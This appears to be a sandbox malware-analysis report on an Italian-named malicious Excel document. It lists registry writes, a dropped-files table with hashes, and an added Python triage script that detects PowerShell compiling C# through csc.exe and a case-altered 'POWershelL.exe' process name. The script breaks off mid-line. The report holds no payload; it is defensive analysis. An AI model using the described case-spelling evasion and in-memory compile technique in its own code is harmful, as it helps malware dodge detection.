HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5054
Bulgarian (Latin)
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5032
Czech (QWERTY)
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5012
German (IBM)
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5048
Greek (220)
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5092
United States-Dvorak
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5021
Spanish Variation
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5034
Hungarian 101-key
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5016
Italian (142)
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5036
Polish (214)
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5126
Portuguese (Brazilian ABNT2)
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5175
Romanian (Standard)
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5056
Russian (Typewriter)
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5040
Slovak (QWERTY)
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5080
Thai Pattachote
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5059
Turkish F
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5044
Latvian (QWERTY)
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5088
Lithuanian
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5121
Armenian Western
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5164
Sorbian Extended
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5174
Macedonian (FYROM) - Standard
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5182
Georgian (QWERTY)
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5105
Hindi Traditional
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5141
Maltese 48-Key
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5143
Sami Extended Norway
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5136
Bengali - INSCRIPT (Legacy)
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5131
Syriac Phonetic
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5167
Sinhala - Wij 9
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5171
Inuktitut - Naqittaut
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5133
Divehi Typewriter
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5185
Uyghur
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5089
Belgian (Comma)
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5137
Finnish with Sami
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5110
Canadian Multilingual Standard
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5125
Gaelic
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5086
Arabic (102) AZERTY
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5173
Bulgarian (Phonetic)
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5087
Czech Programmers
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5049
Greek (319)
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5026
United States-International
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5176
Romanian (Programmers)
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5081
Thai Kedmanee (non-ShiftLock)
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5179
Ukrainian (Enhanced)
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5172
Lithuanian Standard
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5184
Sorbian Standard
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5181
Georgian (Ergonomic)
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5178
Bengali - INSCRIPT
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5142
Sami Extended Finland-Sweden
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5180
Bulgarian
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5050
Greek (220) Latin
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5027
United States-Dvorak for left hand
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5082
Thai Pattachote (non-ShiftLock)
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5195
Bulgarian (Phonetic Traditional)
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5051
Greek (319) Latin
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5028
United States-Dvorak for right hand
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5047
Greek Latin
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5123
US English Table for IBM Arabic 238_L
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5122
Greek Polytonic
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@C:\Windows\system32\input.dll,-5183
Microsoft IME
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@C:\Windows\SYSTEM32\input.dll,-5149
Chinese (Traditional) - New Quick
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@C:\Windows\SYSTEM32\input.dll,-5067
Chinese (Traditional) - ChangJie
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@C:\Windows\SYSTEM32\input.dll,-5111
Chinese (Traditional) - Quick
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@C:\Windows\SYSTEM32\input.dll,-5066
Chinese (Traditional) - Phonetic
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@C:\Windows\SYSTEM32\input.dll,-5090
Chinese (Traditional) - New Phonetic
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@C:\Windows\SYSTEM32\input.dll,-5093
Chinese (Traditional) - New ChangJie
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@C:\Windows\SYSTEM32\input.dll,-5091
Chinese (Simplified) - Microsoft Pinyin New Experience Input Style
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@C:\Windows\SYSTEM32\input.dll,-5076
Chinese (Simplified) - Microsoft Pinyin ABC Input Style
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@C:\Program Files\Common Files\microsoft shared\ink\tiptsf.dll,-90
Tablet PC Correction
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5183
Microsoft IME
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@C:\Windows\IME\SpTip.DLL,-102
Speech Recognition
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@C:\Program Files\Windows NT\TableTextService\TableTextService.dll,-10
Chinese Traditional DaYi (version 6.0)
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@C:\Program Files\Windows NT\TableTextService\TableTextService.dll,-11
Chinese Traditional Array (version 6.0)
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@C:\Program Files\Windows NT\TableTextService\TableTextService.dll,-17
Amharic Input Method (version 1.0)
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@C:\Program Files\Windows NT\TableTextService\TableTextService.dll,-16
Yi Input Method (version 1.0)
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@C:\Program Files\Windows NT\TableTextService\TableTextService.dll,-12
Chinese Simplified QuanPin (version 6.0)
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@C:\Program Files\Windows NT\TableTextService\TableTextService.dll,-14
Chinese Simplified ZhengMa (version 6.0)
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@C:\Program Files\Windows NT\TableTextService\TableTextService.dll,-13
Chinese Simplified ShuangPin (version 6.0)
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@C:\Program Files\Common Files\microsoft shared\ink\tiptsf.dll,-91
Tablet PC Text Insertion
764
rundll32.exe
write
HKEY_CURRENT_USER\Keyboard Layout\Preload
1
00000409
764
rundll32.exe
write
HKEY_CURRENT_USER\Keyboard Layout\Preload
2
00000410
764
rundll32.exe
write
HKEY_CURRENT_USER\Software\Microsoft\CTF\Assemblies\0x00000409\{34745C63-B2F0-4784-8B67-5E12C8701A31}
Default
{00000000-0000-0000-0000-000000000000}
764
rundll32.exe
write
HKEY_CURRENT_USER\Software\Microsoft\CTF\Assemblies\0x00000409\{34745C63-B2F0-4784-8B67-5E12C8701A31}
Profile
{00000000-0000-0000-0000-000000000000}
764
rundll32.exe
write
HKEY_CURRENT_USER\Software\Microsoft\CTF\Assemblies\0x00000409\{34745C63-B2F0-4784-8B67-5E12C8701A31}
KeyboardLayout
67699721
764
rundll32.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
0
764
rundll32.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
1
764
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International\Geo
Nation
118
3920
rundll32.exe
delete key
HKEY_CURRENT_USER\Software\Microsoft\CTF\Assemblies\0x00000409\{34745C63-B2F0-4784-8B67-5E12C8701A31}
3920
rundll32.exe
delete key
HKEY_CURRENT_USER\Software\Microsoft\CTF\Assemblies\0x00000409
3920
rundll32.exe
delete key
HKEY_CURRENT_USER\Software\Microsoft\CTF\SortOrder\Language
3920
rundll32.exe
delete key
HKEY_CURRENT_USER\Software\Microsoft\CTF\SortOrder\AssemblyItem\0x00000409\{34745C63-B2F0-4784-8B67-5E12C8701A31}\00000000
3920
rundll32.exe
delete key
HKEY_CURRENT_USER\Software\Microsoft\CTF\SortOrder\AssemblyItem\0x00000409\{34745C63-B2F0-4784-8B67-5E12C8701A31}
3920
rundll32.exe
delete key
HKEY_CURRENT_USER\Software\Microsoft\CTF\SortOrder\AssemblyItem\0x00000409
3920
rundll32.exe
delete key
HKEY_CURRENT_USER\Software\Microsoft\CTF\SortOrder\AssemblyItem\0x00000410\{34745C63-B2F0-4784-8B67-5E12C8701A31}\00000000
3920
rundll32.exe
delete key
HKEY_CURRENT_USER\Software\Microsoft\CTF\SortOrder\AssemblyItem\0x00000410\{34745C63-B2F0-4784-8B67-5E12C8701A31}
3920
rundll32.exe
delete key
HKEY_CURRENT_USER\Software\Microsoft\CTF\SortOrder\AssemblyItem\0x00000410
3920
rundll32.exe
delete key
HKEY_CURRENT_USER\Software\Microsoft\CTF\SortOrder\AssemblyItem
3920
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
LanguageList
en-US
3920
rundll32.exe
write
HKEY_CURRENT_USER\Keyboard Layout\Preload
1
00000409
3920
rundll32.exe
write
HKEY_CURRENT_USER\Keyboard Layout\Preload
2
00000410
3920
rundll32.exe
write
HKEY_CURRENT_USER\Software\Microsoft\CTF\Assemblies\0x00000409\{34745C63-B2F0-4784-8B67-5E12C8701A31}
Default
{00000000-0000-0000-0000-000000000000}
3920
rundll32.exe
write
HKEY_CURRENT_USER\Software\Microsoft\CTF\Assemblies\0x00000409\{34745C63-B2F0-4784-8B67-5E12C8701A31}
Profile
{00000000-0000-0000-0000-000000000000}
3920
rundll32.exe
write
HKEY_CURRENT_USER\Software\Microsoft\CTF\Assemblies\0x00000409\{34745C63-B2F0-4784-8B67-5E12C8701A31}
KeyboardLayout
67699721
3920
rundll32.exe
write
HKEY_CURRENT_USER\Software\Microsoft\CTF\SortOrder\Language
00000001
00000409
3920
rundll32.exe
write
HKEY_CURRENT_USER\Software\Microsoft\CTF\SortOrder\Language
00000000
00000410
3920
rundll32.exe
write
HKEY_CURRENT_USER\Software\Microsoft\CTF\SortOrder\AssemblyItem\0x00000409\{34745C63-B2F0-4784-8B67-5E12C8701A31}\00000000
CLSID
{00000000-0000-0000-0000-000000000000}
3920
rundll32.exe
write
HKEY_CURRENT_USER\Software\Microsoft\CTF\SortOrder\AssemblyItem\0x00000409\{34745C63-B2F0-4784-8B67-5E12C8701A31}\00000000
Profile
{00000000-0000-0000-0000-000000000000}
3920
rundll32.exe
write
HKEY_CURRENT_USER\Software\Microsoft\CTF\SortOrder\AssemblyItem\0x00000409\{34745C63-B2F0-4784-8B67-5E12C8701A31}\00000000
KeyboardLayout
67699721
3920
rundll32.exe
write
HKEY_CURRENT_USER\Software\Microsoft\CTF\SortOrder\AssemblyItem\0x00000410\{34745C63-B2F0-4784-8B67-5E12C8701A31}\00000000
CLSID
{00000000-0000-0000-0000-000000000000}
3920
rundll32.exe
write
HKEY_CURRENT_USER\Software\Microsoft\CTF\SortOrder\AssemblyItem\0x00000410\{34745C63-B2F0-4784-8B67-5E12C8701A31}\00000000
Profile
{00000000-0000-0000-0000-000000000000}
3920
rundll32.exe
write
HKEY_CURRENT_USER\Software\Microsoft\CTF\SortOrder\AssemblyItem\0x00000410\{34745C63-B2F0-4784-8B67-5E12C8701A31}\00000000
KeyboardLayout
68158480
1916
EXCEL.EXE
delete key
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
1916
EXCEL.EXE
delete key
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency
1916
EXCEL.EXE
delete key
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\12C6B4
1916
EXCEL.EXE
delete key
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery
1916
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
0`"
306022007C070000010000000000000000000000
1916
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
Off
1916
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
On
1916
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1040
On
1916
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel
MTTT
7C070000D2B331B1F420D50100000000
1916
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
0
1916
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
1
1916
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\12C6B4
12C6B4
––
1916
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\12C6B4
12C6B4
––
1916
EXCEL.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
EXCELFiles
1321992217
1916
EXCEL.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
ProductFiles
1321992339
1916
EXCEL.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
VBAFiles
1321992197
1916
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\12C6B4
12C6B4
––
1916
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\12C925
12C925
––
1916
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Place MRU
Max Display
25
1916
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\File MRU
Max Display
25
1916
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Licensing
538F6C892AD540068154C6670774E980
01000000270000007B39303134303030302D303033442D303030302D303030302D3030303030303046463143457D005A0000004F00660066006900630065002000310034002C0020004F0066006600690063006500500072006F00660065007300730069006F006E0061006C002D00520065007400610069006C002000650064006900740069006F006E000000
1916
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Security\Trusted Documents
LastPurgeTime
26005439
2752
POWershelL.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
LanguageList
en-US
2752
POWershelL.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\POWershelL_RASAPI32
EnableFileTracing
0
2752
POWershelL.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\POWershelL_RASAPI32
EnableConsoleTracing
0
2752
POWershelL.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\POWershelL_RASAPI32
FileTracingMask
4294901760
2752
POWershelL.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\POWershelL_RASAPI32
ConsoleTracingMask
4294901760
2752
POWershelL.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\POWershelL_RASAPI32
MaxFileSize
1048576
2752
POWershelL.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\POWershelL_RASAPI32
FileDirectory
%windir%\tracing
2752
POWershelL.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\POWershelL_RASMANCS
EnableFileTracing
0
2752
POWershelL.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\POWershelL_RASMANCS
EnableConsoleTracing
0
2752
POWershelL.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\POWershelL_RASMANCS
FileTracingMask
4294901760
2752
POWershelL.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\POWershelL_RASMANCS
ConsoleTracingMask
4294901760
2752
POWershelL.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\POWershelL_RASMANCS
MaxFileSize
1048576
2752
POWershelL.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\POWershelL_RASMANCS
FileDirectory
%windir%\tracing

Files activity

Executable files
0
Suspicious files
5
Text files
2
Unknown types
0

Dropped files

PID | Process | Filename | Type | MD5 | SHA256
2356 | csc.exe | C:\Users\admin\AppData\Local\Temp\pnefnq9q.dll | –– | –– | ––
2752 | POWershelL.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\GJPDKVX6CS98V0M2ZBCG.temp | –– | –– | ––
3364 | cvtres.exe | C:\Users\admin\AppData\Local\Temp\RESD23D.tmp | –– | –– | ––
2356 | csc.exe | C:\Users\admin\AppData\Local\Temp\pnefnq9q.pdb | –– | –– | ––
2356 | csc.exe | C:\Users\admin\AppData\Local\Temp\CSCD23C.tmp | –– | –– | ––
2752 | POWershelL.exe | C:\Users\admin\AppData\Local\Temp\pnefnq9q.0.cs | text | 6b2bd80fdfb6965d0de7d15c422379b0 | e11c041fb3a098c00c58b6462deabe2d723fee907c62f4322848cd9ecdc63a48
2752 | POWershelL.exe | C:\Users\admin\AppData\Local\Temp\pnefnq9q.cmdline | text | 853b4253776c0f47f159c7970ca794cc | 2bfe40625ed2d8db352b5444cda18afb426cadfe68ed30cb27522beb404b129b
2752 | POWershelL.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | 131dc75f6d4142ca9244945a91a71e8d | f17c463c77b5da9e795770a82e0a7fb1023023f44397f6e080721e9811b2a0c4
2752 | POWershelL.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF12ce93.TMP | binary | 131dc75f6d4142ca9244945a91a71e8d | f17c463c77b5da9e795770a82e0a7fb1023023f44397f6e080721e9811b2a0c4
2356 | csc.exe | C:\Users\admin\AppData\Local\Temp\pnefnq9q.out | –– | –– | ––
1916 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVRC490.tmp.cvr | –– | –– | ––
3360 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\~DF3A9BA4CD0C6823AE.TMP | –– | –– | ––
3360 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\doc483 del 04 Giugno _Srl.xls | document | 85674182a8ae6de7104b57723c6744c3 | 14c5ae183ade2081359bdf2e69b49ecb382432e31f5d6558f9eb3c34fd2a96d3
3360 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\~DFA465033782480479.TMP | –– | –– | ––
1432 | POWershelL.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF11fc5e.TMP | binary | 131dc75f6d4142ca9244945a91a71e8d | f17c463c77b5da9e795770a82e0a7fb1023023f44397f6e080721e9811b2a0c4
1432 | POWershelL.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | 131dc75f6d4142ca9244945a91a71e8d | f17c463c77b5da9e795770a82e0a7fb1023023f44397f6e080721e9811b2a0c4
1432 | POWershelL.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\59HKA8KTK6C1EBCHAFCB.temp | –– | –– | ––
3360 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVREDB8.tmp.cvr | –– | –– | ––

Find more information about the static content, and download it, in the full report.
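The dropped-file list above carries the fingerprint of an on-the-fly C# compile: POWershelL.exe (PID 2752) writes pnefnq9q.0.cs and pnefnq9q.cmdline into %TEMP%, csc.exe (PID 2356) then produces pnefnq9q.out, pnefnq9q.dll and pnefnq9q.pdb plus a CSC*.tmp scratch file, and cvtres.exe (PID 3364) leaves RES*.tmp. That is the file set the .NET CodeDom C# provider writes, which is what PowerShell's Add-Type relies on; the report does not show the PowerShell command line, so attributing the compile to Add-Type is an inference, not something the report states. The mixed-case process name POWershelL.exe is also worth a check of its own, since it only matches "powershell.exe" case-insensitively. The Python script below is an added example written for this page, not ANY.RUN's code: it replays the (PID, process, path) records copied from the table above and flags both patterns. The canonical image-name map, the CodeDom suffix list and the scratch-file regex are the example's own assumptions.

```python
"""Triage of the Dropped files table above (added example, not ANY.RUN code)."""
import re
from collections import defaultdict

# (pid, process, path) records copied from the Dropped files table above.
DROPPED = [
    (2356, "csc.exe",        r"C:\Users\admin\AppData\Local\Temp\pnefnq9q.dll"),
    (2752, "POWershelL.exe", r"C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\GJPDKVX6CS98V0M2ZBCG.temp"),
    (3364, "cvtres.exe",     r"C:\Users\admin\AppData\Local\Temp\RESD23D.tmp"),
    (2356, "csc.exe",        r"C:\Users\admin\AppData\Local\Temp\pnefnq9q.pdb"),
    (2356, "csc.exe",        r"C:\Users\admin\AppData\Local\Temp\CSCD23C.tmp"),
    (2752, "POWershelL.exe", r"C:\Users\admin\AppData\Local\Temp\pnefnq9q.0.cs"),
    (2752, "POWershelL.exe", r"C:\Users\admin\AppData\Local\Temp\pnefnq9q.cmdline"),
    (2752, "POWershelL.exe", r"C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms"),
    (2356, "csc.exe",        r"C:\Users\admin\AppData\Local\Temp\pnefnq9q.out"),
    (1916, "EXCEL.EXE",      r"C:\Users\admin\AppData\Local\Temp\CVRC490.tmp.cvr"),
    (3360, "EXCEL.EXE",      r"C:\Users\admin\AppData\Local\Temp\~DF3A9BA4CD0C6823AE.TMP"),
    (3360, "EXCEL.EXE",      r"C:\Users\admin\AppData\Local\Temp\doc483 del 04 Giugno _Srl.xls"),
    (3360, "EXCEL.EXE",      r"C:\Users\admin\AppData\Local\Temp\~DFA465033782480479.TMP"),
    (1432, "POWershelL.exe", r"C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\59HKA8KTK6C1EBCHAFCB.temp"),
    (3360, "EXCEL.EXE",      r"C:\Users\admin\AppData\Local\Temp\CVREDB8.tmp.cvr"),
]

# Assumed canonical spellings. A process name that matches one of these only
# case-insensitively was spelled that way by whatever launched it; macro
# droppers do this to slip past case-sensitive string matching.
CANONICAL = {"powershell.exe": "powershell.exe", "csc.exe": "csc.exe",
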